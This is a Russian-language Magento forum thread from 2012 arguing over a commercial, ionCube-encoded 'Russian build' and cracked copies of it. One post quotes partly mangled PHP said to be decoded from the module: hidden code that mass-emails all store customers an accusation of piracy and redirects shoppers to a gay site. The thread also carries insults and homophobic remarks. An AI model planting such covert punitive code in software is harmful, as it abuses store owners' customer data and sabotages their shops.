Magento Forum

Дмитрий Федюк (dfediuk | Dmitry Fediuk) - модуль “Робокасса” российской сборки

klyopsany
Jr. Member

Total Posts:  12

noonesshadow - 18 December 2012 07:40 AM

Действительно, в версии vzlomschik (Дмитрий Федюк, псевдоним)
изменена логика проверки. Как подтверждение:

function piratesPunish()

{
        $rand 
rand(120);
        if (
=== $rand)

{
            $this
->notifyCustomersAboutPirate();

}

if (=== $rand)

{
            $this
->redirectToGayWebsite();

}

return $this;

}

function notifyCustomersAboutPirate()

{
        $customers 
Mage::getresourcemodel(\'customer/customer_collection\');

df_assert($customers instanceof Mage_Customer_Model_Resource_Customer_Collection);

$mail = new Zend_Mail(\'utf-8\');

$mail->setFrom(df()->mail()->getCurrentStoreMailAddress())->setSubject(\'Наш магазин подворовывает\');
        foreach (
$customers as $customer)

{
            df_assert
($customer instanceof Mage_Customer_Model_Customer);

$mail->addTo($customer->getData(\'email\'));

}
        $mail
->addTo(\'support@dfediuk.com\');

$mail->setBodyText(\'Наш магазин подворовывает у вас и использует пиратское программное обеспечение.\');

$mail->send();
        return 
$this;

}

function redirectToGayWebsite()

{

if (!headers_sent())

{
            sprintf
(\'%s перенаправлен к геям\'df()->request()->getController()->getRequest()->getHttpHost());

$text df()->request()->getController()->getResponse()->setRedirect(\'http://love.gay.ru/search.phtml?t=a&sz;=s&ia;=M&lf;=M⁡=&at;=&s;_c=3159_0_0_0&s;_tg=\');

mail(\'support@dfediuk.com\'$text$text);

}

return $this;

}
    }

а где Вы такой код увидели?
Раскодировали?
Можете полностью раскодированый скрипт дать

Magento Community Magento Community
Magento Community
Magento Community

klyopsany
Jr. Member

noonesshadow - поделитесь опытом как открыть скрипт.
Зарание спасибо.

Magento Community
Magento Community

Grohotun
Sr. Member

Total Posts:  139
Saint-Petersburg

Дмитрий Федюк - 19 December 2012 04:27 AM

Новогодняя распродажа на Российскую сборку Magento: 4 лицензии по цене 2-х!
Отличная возможность для веб-студий закупиться лицензиями на Российскую сборку Magento на весь 2013 год!
Акция действует с 19 декабря по 10 января.

Как оплатить?
Основная информация

ваше угэ никому не надо.
все те, кто купили - жалеют об этом.

особенно смешно смотреть, как работают ваши модули для расчета доставки - меняют user agent и отсылают в веб калькулятор, хотя есть API, который работает стабильней и быстрее ...

Magento Community
Magento Community

riginavi
Jr. Member

2dimaosna

У вас параноя началась. Можете сообщать куда угодно. Будет не здесь, так в другом месте.Ничего не изменится. Спама тут и так хватает, и никто его не чистит. Так что не пугайте. Пуганные. Без обид.
Мне, объяснять разницу Вам в ваши картинках честно харит просто. Если бы вы скачивали самый первых архив, то наверное прочли бы там txt файлик. И вы таки до сих пор думаете шо сам свои данные выкладывал? Не смешите ни меня ни те акаунты что вы намалевали. Кстати первая версия рабочая 100%. А вы даже не проверяли а уже кричите на всю Дерибасовскую шо Моня засланый. Ой вэй… Стыдно.
А вот акаунт Федюка прибить бы не мешало. Вместе со взломщиком.

Magento Community
Magento Community

dimaosna
Sr. Member

Total Posts:  251

Почитай здесь внимательно, грамотей.
Если присутствует, хотя бы один файл PHP кодируемый в ionCube PHP Encoder , а ключей у вас нет....
В этом файле PHP зашифрованном, злоумышленник может прописать вагон и тележку грязи и включить таймер.
.
Что новогодний климакс начался....?

Magento Community
Magento Community

riginavi
Jr. Member

Дима, ничего личного, но вы хам. Не хочу ничего доказывать. Можете дальше орать что хотите.
Когда то вам будет стыдно за эти слова. Сделал скрины с вашими перлами. Ещё вернёмся к этому вопросу.

Magento Community
Magento Community

andrich
Jr. Member

Total Posts:  15

dimaosna - 19 December 2012 01:04 AM

Ну на доже сколько у тебя здесь аккаунтов Дима, ты не устал регистрироваться. 
riginavi
topmoda
andrich
vzlomschik

dimaosna Выдыхай. В 11 действительно был косяк идиота Федюка. Не всегда бывает возможно всё усмотреть.

Мне нечего выдыхать я просто открыл глаза людям.
.
1) После первого поста написанный тобой я просто посмеялся.
Благодарные клиенты представляют “Антироссийскую сборку”!
.
2) После второго поста твоего я задумался, почему люди верят этому Идиоту.
Удален бекдор
.
3) Ну а третий пост это уже наглое впихивание грязи на форум…
Тестируем.
.
4) Четвертый пост. Это визг поросенка .
Поставил себе 2.13.11 из архива выше.
.
Я не ставил локально грязь, и не поставлю, и тем более на Удаленные, Хостинг или Сервер.
.
Другим я тоже советую не устанавливать грязь на Хостинг или Сервер.
Единственное можно взять от сборки локализацию, и то больше половина спер у Niro
.
И почему везде написано, что сломанная сборка.
Не один файл не изменен, и кодированы главные файлы PHP.

Дурочку не включай, и не распространяй Спам
Если будете продолжать я сообщу, Администрации сайта что ты раздаешь Спам .
Anti-Fediuk Лож и Провокация

Дима блин, включай уже свой мозг или читай посты выше! Такое ощущение что ты один из заговоренных Федюком, ник мой набери на форуме ради интереса! Чо ты людей в заблуждение вводишь, тебе может бесплатно сборку дали за посты?

Magento Community
Magento Community

Deus
Sr. Member

Total Posts:  120
Russia. Moscow

К Дмитрию Федюку.

Я знаю, что Вы по понятным причинам, крайне интересуетесь этой веткой. У вас Дмитрий Федюк вероятно начинается паранойя. Рекомендую обратиться к специалистам. 
Не готов и не в моих правилах Вас оскорблять. Просто другое воспитание. Вы сами, Дмитрий, когда то наступили на эти грабли, взвалив на себя то, что просто не смогли унести. А когда это поняли (т.к при всём негативе не считаю вас глупым человеком) решили поиграть в Остапа Бендера, продавая воздух, при чем не самый чистый.  Не обижайтесь, но Вы брали деньги с людей по большому счету не за свой, а за чужой труд. Другими словами присвоили деньги и славу абсолютно Вам не принадлежащие. Безусловно, толика труда есть там и Ваша, но она никак не стоит тех денег, которые Вы просите.

Я не специалист, но и при этом понял, что собрана она в большинстве своём действительно из бесплатных модулей. Объясните мне, если считаете себя правым, почему одностраничный заказ у Вас до боли похож на большинство подобных отдельных, как платных, так и бесплатных модулей других разработчиков, в общем, как и полностраничное кэширование и ещё процентов 80 модулей? Ну, Вы бы диз тогда что ли потрудились отрисовать или фишку какую-нибудь придумали.

А Вы в курсе Дмитрий, что у большинства якобы пользователей, якобы Вашей сборки (с вашего же форума) сборка либо отключена, либо удалена полностью? Как специалист по рекламе и маркетингу рекомендую вам на форуме указать раз в 10 больше сайтов. Это привлечет дополнительную аудиторию и Вы им в очередной раз будете рассказывать, как жизненно необходимо им якобы Ваше детище за скромные несколько сотен $.  И если Вы думаете, что чем больше о Вас пишут тем Вы становитесь популярнее, то смею Вас огорчить. Популярность бывает разная. 
Не стоит считать себя самым умным. В этой ветке Вам уже доказали, что есть люди и по умнее. В общем, это сражение Вы Дмитрий проиграли, так будьте мужчиной. Или, (не сочтите за оскорблении) по поводу мужчины я ошибся? И Вы не зря отправляете народ на известные только Вам гей сайты? В общем, если вы Дмитрий - женщина, то Бог Вам судья. Если мужчина тогда не стоит прятаться и играть в партизан. Мы бы Дмитрий, наверно все, с удовольствием Вас послушали (почитали) и те кого Вы кинули и те, кого не успели.
Сейчас Дмитрий, Вы вероятно злы и обижены. Но ведь так и должно быть и всё рано или поздно возвращается.

Magento Community
Magento Community

Deus
Sr. Member

Russia. Moscow

Теперь к общественности. )))

По поводу выкладываемой сборки. Не знаю, как последние версии , но вторая выложенная работает без видимых проблем. Никому ничего не отсылает и письма про “подворовывания” в том числе. Проверено на двух сайтах. То, что большая половина сборки это никому ненужный хлам из фришных модулей, спорить не буду.

Дима, зря Вы так по списку прошлись. Так, на пример одного из указанных Вами товарищей я знаю практически лично. И он действительно, так же как и я забанен господином Федюком на известном форуме. Не стоит во всём и везде видеть один сплошной негатив.
К стати. Не знаю сами ли Вы переводили и выкладывали книжки по magento, но если так, то Вам большой респект. А вот на одном из форумов Федюк их выкладывает как своё творение. Где же правда?
Ну и на последок. Давайте действительно, как писал niro не превращать форум в помойку.
Почитайте форумы других CMS. Может они не такие крутые, как magento, но люди там гораздо лояльнее друг к другу относятся. Если есть проблема - стараются её как то сообща решить.
Я тут заметил, что чем серьёзнее CMS тем больше на форумах человек человеку волк. Тот же Битрикс или Typo3 и иже с ними. Там на форумах ты или гений, или недостойный мудак. Прям, как на Федюковском. Вот поэтому наверно большинство хороших и серьёзных проектов в России не развивается и умирает.
Понятное дело, что каждый хочет где то заработать копеечку, кто то меньше чем за 500$ свою задницу не оторвёт. И каждый по своему прав, так как этому учился и вправе сам распоряжаться навыками и умениями, как пожелает. да и жизнь в принципе сейчас такая.
С другой стороны почитайте в сети, что пишет народ о русском форуме magento и, как после этого Федюк всеми правдами и не правдами зазывает народ на свой, втюхивая известный продукт.
И вместо того чтобы сраться, давайте что ли подумаем, как форум сделать лучше и интереснее (если же это кому-нибудь вообще надо).
Ну и не сочтите за глупый вопрос. Возможно ли на основе той же 1.7.0.2 сделать так сказать российский вариант движка ? Не тупо набор модулей, а двиг с уже установленными и адаптированными расширениями. На сколько это по Вашему реально и правомерно? Ну а далее с согласия правообладателя можно его как то и развивать что ли. В общем, как говориться было бы желание.

Magento Community
Magento Community

dimaosna
Sr. Member

Обращаюсь к Жителям форума и в частности к Deus
.
Я не кого не хотел обидеть, просто открыть глаза людям...
.
Deus Как вы можете утверждать что ваша левая сборка работает пока.
Вы раскодировали главные PHP файлы..?
.
Устанавливая в зашифрованном виде PHP файлы, себе на Сервер или Хостинг.
Вы подкладываете бомбу замедленного действия, заметьте сами себе.
.
Вопрос задал klyopsany
Обратите внимание на этот пост и где этот человек с ответом.

noonesshadow - поделитесь опытом как открыть скрипт.

.
В конечном итоге установив заведомо шифрованные PHP файлы, без ключа ,вы все тут и окажитесь в этой команде.
Мне по большому счету все ровно, но я не вижу радости в этой левой как трубят сломанной версии.
.
Как вы можете управлять, если главные файлы PHP все закодированы....?
.
Значить эти люди или человек, который выставляет на раздачу, эту (псевдо-сломанную версию).
Принадлежит к тому форуму или сам федюк.
.
Я так понимаю это ваш друг который уже сказал что не доглядел.
У меня вопрос он вообще глядел или он не видит что в руки взял.

riginavi
Не всегда бывает возможно всё усмотреть.

-
Или andrich который кричит всем качаем я все проверял.
Интересно что он проверял кодируемый файл PHP или дома почту.....?

andrich
2.13.11 ничего не отсылает)) качаем.

..............................
.
Прежде чем положить надо открыть PHP файлы, и в чистом виде, людям дать на раздачу.
А не баламутить воду в чистом пруду.....

.
На счет книг, этот пост создан для людей а не для меня.
.
Здесь я поблагодарил, людей за перевод книг.
Вы можете изменять на свое усмотрение.
Книги не кодируемые, если что то вас раздражает, то выбросьте.

Magento Community
Magento Community

Deus
Sr. Member

Russia. Moscow

Ну вы Дмитрий аки мессия.

«Я не кого не хотел обидеть, просто открыть глаза людям...»
Не буду с Вами спорить т.к в ваших безусловно есть словах доля правды.

«Deus Как вы можете утверждать что ваша левая сборка работает пока».

Ну начнём с того, что сборка не моя. Или Вы пишете это мне, как предполагаемому Дмитрию Федюку? Тогда это уже действительно смешно. Я не утверждаю, что всё работает идеально. Я лишь говорю о том, что никаких писем клиентам и ссылок к геям мне и моим клиентам не приходило.

«Вы раскодировали главные PHP файлы..?»
Нет, не раскодировал и не поверите, но даже не представляю, как это делается, но предполагаю. А даже если бы каким то чудом сделал это, то смотрел бы на код, как баран на новые ворота.
«Устанавливая в зашифрованном виде PHP файлы, себе на Сервер или Хостинг.
Вы подкладываете бомбу замедленного действия, заметьте сами себе.»

Не спорю, но и однозначно утверждать это не видя того, что находится в зашифрованных файлах тоже наверно не правильно. Или может Дмитрий Вы знаете, что там и поэтому так рьяно отстаиваете свою точку зрения? Тогда поделитесь.

«Мне по большому счету все ровно, но я не вижу радости в этой левой как трубят сломанной версии.»
Это всего лишь Ваше личное субьективное мнение.  Если Вам всё равно чего паритесь то тогда? Дмитрий, Вы фрилансер, программер, вебмастер или же у Вас есть свой собственный интернет магазин? Если Вы относите себя к первым категориям, то спорить с Вами наверно будет бесполезно. Если ко второй то поделитесь тем, как у вас организована на сайте оплата, доставка и т.д. Я знаю, что для многих это животрепещущий вопрос в том числе и для меня, но вместо того чтобы действительно предложить что-либо дельное и не умничать, все почему то начинают строить из себя супер героев и провидцев. Автор же написал, хотите пользуйтесь, а хотите нет. На свой страх и риск. В чем проблема то?

«Я так понимаю это ваш друг который уже сказал что не доглядел. У меня вопрос он вообще глядел или он не видит что в руки взял.»
Вот тут Вы промахнулись и вопрос абсолютно не по адресу. Его всё таки лучше задать автору. Я писал про andrich. Мы действительно знакомы. У него, как и у меня свой магазин. У него на сайте на сколько мне известно нет ни одного фришного модуля и все честно приобретены в том числе и у rugento. Ещё мне известно, что он, как и я когда то, был послан федюком далеко и на долго. Скажу более, что от последнего даже угрозы сыпаться начали. Типа всем нелегальным пользователям сборки срочно её оплатить или……..

«Прежде чем положить надо открыть PHP файлы, и в чистом виде, людям дать на раздачу.
А не баламутить воду в чистом пруду.....»

Абсолютно с Вами согласен.  Возьмётесь за это, героический Вы наш? Писать то и хаять все горазды.

«Книги не кодируемые, если что то вас раздражает, то выбросьте.»
Меня абсолютно ничего не раздражает. Или вы читаете то, что вам выгодно? Я написал, что если это Ваш перевод, то респект за проделанную работу. Если же нет, то респект за то, что нашли и выложили. Вот и всё.

Magento Community
Magento Community

klyopsany
Jr. Member

riginavi - 19 December 2012 05:57 AM

Федюк, сдрысни отсюда. Не раздражай людей своим еб… простите, лицом.

Новогодняя акция!!! Без лицензий. Без оплаты!

Действутет постоянно. Бггг. Тестируйте.

Выхоть раскажите как Вы сделали что она работает?
На локалхосте все работатет - но поставте на сервер и увидите чудо буги-вуги.
Дайте свой способ в баблик как вы и что делаете? а то я ничего не вижу

Image Attachments
1234.jpg12343.jpg

Magento Community
Magento Community

klyopsany
Jr. Member

если ставить на чистую сборку - вот такое пишет смотрите скрин

Image Attachments
123.jpg

Magento Community
Magento Community

klyopsany
Jr. Member

вот лог ошибки

a:5:{i:0;s:149:\"Cannot send headers; headers already sent in shop/magento/app/code/local/Df/Core/Model/Dispatcher.php, line 1\";i:1;s:1158:\"#0 shop/magento/lib/Zend/Controller/Response/Abstract.php(115): Zend_Controller_Response_Abstract->canSendHeaders(true)
#1 shop/magento/app/code/core/Mage/Core/Model/App.php(1246): Zend_Controller_Response_Abstract->setHeader(\’Content-Type\’, \’text/html; char...\’)
#2 shop/magento/app/code/core/Mage/Core/Controller/Varien/Front.php(80): Mage_Core_Model_App->getResponse()
#3 shop/magento/app/code/core/Mage/Core/Model/Url/Rewrite.php(204): Mage_Core_Controller_Varien_Front->getResponse()
#4 shop/magento/app/code/core/Mage/Core/Controller/Varien/Front.php(166): Mage_Core_Model_Url_Rewrite->rewrite()
#5 shop/magento/app/code/core/Mage/Core/Model/App.php(354): Mage_Core_Controller_Varien_Front->dispatch()
#6 shop/magento/app/Mage.php(683): Mage_Core_Model_App->run(Array)
#7 shop/magento/index.php(87): Mage::run(\’\’, \’store\’)
#8 {main}\”;s:3:\"url\”;s:14:\"/shop/magento/\”;s:11:\"script_name\”;s:23:\"/shop/magento/index.php\”;s:4:\"skin\”;s:7:\"default\";}

Magento Community
Magento Community

dimaosna
Sr. Member

Обратите внимания куда ведет ошибка. Смотрите всегда первую строку.
/app/code/local/Df/Core/Model/Dispatcher.php
.

вот лог ошибки

a:5:{i:0;s:149:\\\"Cannot send headers; headers already sent in shop/magento/app/code/local/Df/Core/Model/Dispatcher.php, line 1\\\";i:1;s:1158:\\\"#0 shop/magento/lib/Zend/Controller/Response/Abstract.php(115): Zend_Controller_Response_Abstract->canSendHeaders(true)

.
Это значить PHP закодирован.
.
Решения:
1-установить на Сервер IonCube и ждать привет от друга.
.
2-Обратиться к федику
.
3-Выкинуть и забыть эту муть.

Image Attachments
PHP закодирован.jpg

Magento Community
Magento Community
Magento Community
Magento Community
    Back to top